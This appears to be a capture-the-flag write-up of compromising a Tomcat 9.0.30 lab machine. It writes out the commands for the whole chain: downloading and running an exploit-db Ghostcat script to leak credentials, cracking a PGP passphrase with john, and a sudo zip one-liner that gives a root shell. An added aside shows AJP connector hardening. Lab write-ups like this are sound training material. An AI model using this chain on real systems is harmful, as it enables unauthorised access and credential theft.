[Enumeration]
1. Port scan
nmap -Pn <ip>
2. OS and service scan
nmap -A -p 22,53,8009,8080 <ip>
This machine has Ubuntu Linux, Apache Jserv, and Apache Tomcat 9.0.30.
3. Vulnerable scan
nmap --script vuln <ip>
4. Access HTTP site on port 8080
Click Manager App. If I’m lucky enough, I can access it and upload a reverse shell.
Failed!!! 403 Access Denied!!! I have to find another way.
[Exploitation]
1. Search for exploitation
searchsploit tomcat 9
Copy it
searchsploit -m 41783
Read it. Seems like I cannot use this exploit because the current Tomcat version is 9.0.30.
Let’s search in exploit-db with “tomcat”
This one is the newest.
Seems like this CVE can do the LFI and read some data in tomcat-ajp.
Download it.
wget https://www.exploit-db.com/download/48143
Run the script
python 48143 <target ip>
Seems like I have a credential.
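The weakness the script above relies on is an AJP connector that listens on every interface with no shared secret. As an added example (not part of the original writeup), here is that connector as it commonly shipped in server.xml before Tomcat 9.0.31, beside a hardened form; the secret value is a placeholder.

```xml
<!-- Exposed form: AJP/1.3 on port 8009, bound to all interfaces, no secret.
     Anyone who can reach 8009 can talk AJP to Tomcat directly, which is what
     allows the file read described above. -->
<Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />

<!-- Hardened form: bind to loopback only and require a shared secret that the
     reverse proxy (mod_jk / mod_proxy_ajp) must present. If no AJP proxy sits
     in front of Tomcat, leave the connector commented out entirely.
     REPLACE_WITH_LONG_RANDOM_SECRET is a placeholder, not a real value. -->
<Connector port="8009" protocol="AJP/1.3"
           address="127.0.0.1"
           secretRequired="true"
           secret="REPLACE_WITH_LONG_RANDOM_SECRET"
           redirectPort="8443" />
```

After the change, `nmap -p 8009 <ip>` from another host should report the port as closed or filtered, and the upgrade to a patched Tomcat release (9.0.31 or later) remains the primary fix.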
2. Try to login
ssh skyfuck@<ip>
3. Explore the machine
ls
There’re 2 files: credential.pgp and tryhackme.asc.
cat /etc/passwd
There’re 3 users: root, merlin, and skyfuck.
Try to login as merlin
su merlin
Failed!!!
Explore merlin’s directory
cd /home
ls
cd merlin
ls
cat user.txt
[Privilege Escalation]
1. Verify sudo rights
sudo -l
skyfuck can’t run sudo.
2. Verify SUID
Not much useful
3. Verify cronjob
crontab -e
Nothing
Seems like I can’t do much with skyfuck. I have to escalate to merlin.
4. Use filezilla to download files in /home/skyfuck with skyfuck’s credential.
5. Decrypt the file
Since it’s a PGP file, I have to research. I came across this:
gpg2john credential.pgp
Seems like I failed.
gpg2john tryhackme.asc
Success!!!
Save as a file
gpg2john tryhackme.asc > hash
Crack password
john --wordlist=rockyou.txt hash
john hash --show
Now I have password for pgp file.
Import pgp key and decrypt
gpg --import tryhackme.asc
gpg --decrypt credential.pgp
Now I have merlin’s password.
6. Login as merlin
su merlin
Success!!!
7. Verify sudo
sudo -l
8. Escalate to root using zip
Reference:
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
Now I’m root.
9. Find root.txt
cd /root
ls
cat root.txt